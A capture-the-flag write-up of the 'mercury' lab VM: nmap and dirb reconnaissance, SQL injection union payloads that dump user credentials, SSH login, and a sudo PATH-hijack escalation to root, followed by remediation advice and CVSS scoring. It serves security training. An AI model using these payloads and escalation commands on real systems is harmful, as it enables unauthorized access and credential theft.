## Version 1.4.1
## language: en

Feature:
  TOE:
    mercury
  Category:
    SQL Injection
  Location:
    http://192.168.1.66:8080/mercuryfacts/
  CWE:
    CWE-0089: Improper Neutralization of Special Elements used
  Rule:
    REQ.173: https://fluidattacks.com/web/rules/173/
  Goal:
    Get shell and privilege escalation
  Recommendation:
    Sanitize inputs to avoid SQL statements

  Background:
  Hacker Software:
    | <Software name>   |  <Version> |
    | Kali Linux        |  2020.3    |
    | Nmap              |  7.80      |
    | SSH               |  7.9       |
    | dirb              |  2.22      |

  TOE information:
    Given a file with the .OVA file extension is delivered
    Then I run it on virtualbox
    And I realize that a user is required to log in to the system
    Then I proceed to make a scan with nmap on my network with the command
    """
    $ nmap -sn 192.168.1.0/24
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-15 08:01 -05
    Nmap scan report for 192.168.1.50
    Host is up (0.0083s latency).
    Nmap scan report for 192.168.1.51
    Host is up (0.033s latency).
    Nmap scan report for 192.168.1.53
    Host is up (0.032s latency).
    Nmap scan report for 192.168.1.55
    Host is up (0.075s latency).
    Nmap scan report for 192.168.1.60
    Host is up (0.020s latency).
    Nmap scan report for 192.168.1.66
    Host is up (0.0054s latency).
    Nmap scan report for 192.168.1.69
    Host is up (0.0034s latency).
    Nmap scan report for 192.168.1.254
    Host is up (0.091s latency).
    Nmap done: 256 IP addresses (8 hosts up) scanned in 14.92 seconds
    """
    Then I determined that the ip of the machine is 192.168.1.66
    And it has the ports 22 and 8080 open
    """
    $ sudo nmap -sV -sS 192.168.1.66
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-15 08:14 -05
    Nmap scan report for 192.168.1.66
    Host is up (0.00022s latency).
    Not shown: 998 closed ports
    PORT     STATE SERVICE    VERSION
    22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux;
    8080/tcp open  http-proxy WSGIServer/0.2 CPython/3.8.2
    1 service unrecognized despite returning data. If you know the service/ver
    SF-Port8080-TCP:V=7.80%I=7%D=9/15%Time=5F60BE40%P=x86_64-pc-linux-gnu%r(Ge
    SF:tRequest,135,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Tue,\x2015\x20Sep\x202
    ...
    SF:0DENY\r\nContent-Length:\x2069\r\nX-Content-Type-Options:\x20nosniff\r\
    SF:nReferrer-Policy:\x20same-origin\r\n\r\nHello\.\x20This\x20site\x20is\x
    SF:20currently\x20in\x20development\x20please\x20check\x20back\x20later\."
    SF:)%r(HTTPOptions,135,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Tue,\x2015\x20S
    SF:ep\x202020\x2013:14:42\x20GMT\r\nServer:\x20WSGIServer/0\.2\x20CPython/
    ...
    ...
    SF:s:\x20DENY\r\nContent-Length:\x202366\r\nX-Content-Type-Options:\x20nos
    SF:niff\r\nReferrer-Policy:\x20same-origin\r\n\r\n<!DOCTYPE\x20html>\n<htm
    SF:l\x20lang=\"en\">\n<head>\n\x20\x20<meta\x20http-equiv=\"content-type\"
    SF:\x20content=\"text/html;\x20charset=utf-8\">\n\x20\x20<title>Page\x20no
    SF:t\x20found\x20at\x20/nice\x20ports,/Trinity\.txt\.bak</title>\n\x20\x20
    SF:<meta\x20name=\"robots\"\x20content=\"NONE,NOARCHIVE\">\n\x20\x20<style
    SF:\x20type=\"text/css\">\n\x20\x20\x20\x20html\x20\*\x20{\x20padding:0;\x
    ...
    SF:-size:60%;\x20color:#666;\x20font-weight:normal;\x20}\n\x20\x20\x20\x20
    SF:table\x20{\x20border:none;\x20border-collapse:\x20collapse;\x20width:10
    SF:0%;\x20}\n\x20\x20\x20\x20td,\x20th\x20{\x20vertical-align:");
    MAC Address: 08:00:27:07:87:14 (Oracle VirtualBox virtual NIC)
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results at
    Nmap done: 1 IP address (1 host up) scanned in 95.14 seconds
    """

  Scenario: Normal use case
    Given I access the site http://192.168.1.66:8080/
    Then I see a message
    """
    Hello. This site is currently in development please check back later.
    """
    And just that [evidences](normal.png)

  Scenario: Static detection
    Given I don't have access to the source code
    Then I can't do static detection

  Scenario: Dynamic detection
    Given I'm in the website the first thing I did was to check "/robots.txt"
    Then I saw nothing interesting
    """
    User-agent: *
    Disallow: /
    """
    And and then I proceeded to parse with dirb the directories on the server
    """
    $ dirb http://192.168.1.66:8080/
    -----------------
    DIRB v2.22
    By The Dark Raver
    -----------------

    START_TIME: Tue Sep 15 08:09:49 2020
    URL_BASE: http://192.168.1.66:8080/
    WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

    -----------------

    GENERATED WORDS: 4612

    ---- Scanning URL: http://192.168.1.66:8080/ ----
    + http://192.168.1.66:8080/robots.txt (CODE:200|SIZE:26)

    -----------------
    END_TIME: Tue Sep 15 08:10:28 2020
    DOWNLOADED: 4612 - FOUND: 1
    """
    And I didn't find anything useful
    Then I carefully checked the nmap report
    And I noticed a file "Trinity.txt"
    """
    ...
    SF:s:\x20DENY\r\nContent-Length:\x202366\r\nX-Content-Type-Options:\x20nos
    SF:niff\r\nReferrer-Policy:\x20same-origin\r\n\r\n<!DOCTYPE\x20html>\n<htm
    SF:l\x20lang=\"en\">\n<head>\n\x20\x20<meta\x20http-equiv=\"content-type\"
    SF:\x20content=\"text/html;\x20charset=utf-8\">\n\x20\x20<title>Page\x20no
    SF:t\x20found\x20at\x20/nice\x20ports,/Trinity\.txt\.bak</title>\n\x20\x20
    SF:<meta\x20name=\"robots\"\x20content=\"NONE,NOARCHIVE\">\n\x20\x20<style
    SF:\x20type=\"text/css\">\n\x20\x20\x20\x20html\x20\*\x20{\x20padding:0;\x
    ...
    """
    Then I check this file but it was not found, maybe it was and was deleted
    And thanks to this I could notice something interesting [evidences](nt.png)
    And it is that the page is developed in Django and it is also in debug mode
    """
    Using the URLconf defined in mercury_proj.urls, Django tried these URL
    patterns, in this order:

        [name='index']
        robots.txt [name='robots']
        mercuryfacts/

    The current path, Trinity.txt, didn't match any of these.
    """
    And I see a directory "mercuryfacts"
    When I access the url http://192.168.1.66:8080/mercuryfacts/
    Then I think that since the site is in debug mode
    Then I could get more information in the same way as I did before
    When I test "http://192.168.1.66:8080/mercuryfacts/aaaaaaa.txt"
    Then I get the following error: [evidences](sameway.png)
    And this error came with a prize because the file cannot be found
    And also generates an SQL syntax error
    """
    (1054, "Unknown column 'aaaaaaa.txt' in 'where clause'")
    """

  Scenario: Exploitation
    Given the site is vulnerable to SQL injection
    Then the idea is to take advantage of the vuln to query the database
    And I thought it would be a good idea to get the users from the DDBB
    Then the first thing is to know the number of columns in the table
    And for this I can use "order by"
    """
    mercuryfacts/1 order by 2/
    """
    Then the site returns error [evidences](orderby2.png)
    And this means that the table has less than 2 columns
    Then only it could have one column
    And I continue to get information about the tables in the database
    """
    mercuryfacts/1 union select table_name from information_schema.tables/
    """
    Then I get the following tables: [evidences](tablename.png)
    """
    ...
    ('TABLE_PRIVILEGES',), ('TRIGGERS',), ('USER_ATTRIBUTES',),
    ('USER_PRIVILEGES',), ('VIEWS',), ('VIEW_ROUTINE_USAGE',),
    ('VIEW_TABLE_USAGE',), ('facts',), ('users',))
    """
    And I decide to get information about the users table [evidences](colm.png)
    """
    mercuryfacts/1 union select column_name from information_schema.columns
    where table_name='users'/
    """
    Then I see that there is two interesting columns: "password" and "username"
    And I decide to get info about this columns with the following query
    """
    mercuryfacts/1 union select group_concat(id, 0x3a3a, username,
    0x3a3a, password) from users/
    """ [evidences](users.png)
    Then I test the users crendentials with the SSH service
    And I manage to access the system
    And recover the user flag [evidences](userflag.png)

  Scenario: Privilege Scalation
    Given I got shell as webmaster user
    Then the idea is get root user privileges
    And for that I must find some way to escalate privileges
    Then what I do is look for executables with super user permissions (root)
    """
    $ find / -perm -u=s -type f 2>/dev/null
    /usr/bin/sudo
    /usr/bin/gpasswd
    /usr/bin/su
    /usr/bin/chsh
    /usr/bin/newgrp
    /usr/bin/mount
    /usr/bin/chfn
    /usr/bin/at
    /usr/bin/pkexec
    /usr/bin/umount
    /usr/bin/fusermount
    /usr/bin/passwd
    /usr/lib/eject/dmcrypt-get-device
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /usr/lib/openssh/ssh-keysign
    /usr/lib/policykit-1/polkit-agent-helper-1
    """
    And I couldn't use those binaries to my advantage
    Then I see a folder in which contains a file called "notes.txt"
    """
    Project accounts (both restricted):
    webmaster for web stuff -
    webmaster:bWVyY3VyeWlzdGhlc2l6ZW9mMC4wNTZFYXJ0aHMK
    linuxmaster for linux stuff -
    linuxmaster:bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg==
    """ [evidences](notes.txt)
    Then at this point it's clear, I decode the base64 which is the password
    And log in as linuxmaster
    """
    $ su linuxmaster
    Password:
    linuxmaster@mercury:/home/webmaster/mercury_proj$
    """
    Then I notice that linuxmaster can execute a root file
    """
    $ sudo -l
    [sudo] password for linuxmaster:
    Matching Defaults entries for linuxmaster on mercury:
        env_reset, mail_badpass, secure_path=/usr/local/sbin

    User linuxmaster may run the following commands on mercury:
        (root : root) SETENV: /usr/bin/check_syslog.sh
    """
    When I read the file I see that I can do symlink with the "tail" command
    """
    #!/bin/bash
    tail -n 10 /var/log/syslog
    """
    And I use vi to run shell
    """
    $ ln -s /bin/vi tail
    $ export PATH=.:$PATH
    $ sudo --preserve-env=PATH /usr/bin/check_syslog.sh
    2 files to edit

    # id
    uid=0(root) gid=0(root) groups=0(root)
    # ls
    tail
    """
    Then I can read the root flag [evidences](root.png)

  Scenario: Remediation
    Given The site is susceptible to SQL injection attacks
    Then there are many ways to defend against these types of attacks
    """
    1. Use of Prepared Statements (with Parameterized Queries)
    2. Use of Stored Procedures
    3. Whitelist Input Validation
    4. Escaping All User Supplied Input
    5. Among other
    """

  Scenario: Scoring
    Severity scoring according to CVSSv3 standard
    Base: Attributes that are constants over time and organizations
      7.6/10 (High) - AV:A/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N/
    Temporal: Attributes that measure the exploit's popularity and fixability
      7.4/10 (High) - E:H/RL:W/RC:C/
    Environmental: Unique and relevant attributes to a specific user environmen
      7.8/10 (High) - CR:H/IR:H/AR:L

  Scenario: Correlations
    No correlations have been found to this date 2020-09-15
